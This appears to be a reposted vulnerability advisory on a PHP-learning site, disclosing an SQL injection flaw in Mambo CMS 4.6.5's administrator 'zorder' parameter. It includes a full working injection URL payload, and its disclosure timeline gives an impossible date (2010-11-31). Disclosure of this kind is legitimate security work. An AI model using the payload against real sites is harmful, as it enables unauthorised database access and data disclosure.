来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] =========================================Mambo CMS 4.6.x (4.6.5) | SQL Injection=========================================1.概述Mambo CMS 4.6.5及更低版本含注射缺陷2. 背景Mambo is a full......
|
=========================================
Mambo CMS 4.6.5及更低版本含注射缺陷
Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo's "power in simplicity" also makes it the CMS of choice for many small businesses and personal sites.
The "zorder" parameter was not properly sanitized upon submission to the administrator/index2.php url, which allows attacker to conduct SQL Injection attack. This could an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
Mambo CMS 4.6.5已测试
http://www.2cto.com /mambo/administrator/index2.php?limit=10&order[]=11&boxchecked=0&toggle=on&search=sqli&task=&limitstart=0&cid[]=on&zorder=-1 OR (SELECT 9999 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,112,101,58),(SELECT (CASE WHEN (9999=9999) THEN 1 ELSE 0 END)),CHAR(58,110,100,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&filter_authorid=62&hidemainmenu=0&option=com_typedcontent
The vendor seems to discontinue the development. It is recommended to use another CMS in active development.
Mambo CMS Development Team
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
2010-11-31: notified vendor through bug tracker
Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[mambo4.6_x]_sql_injection
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
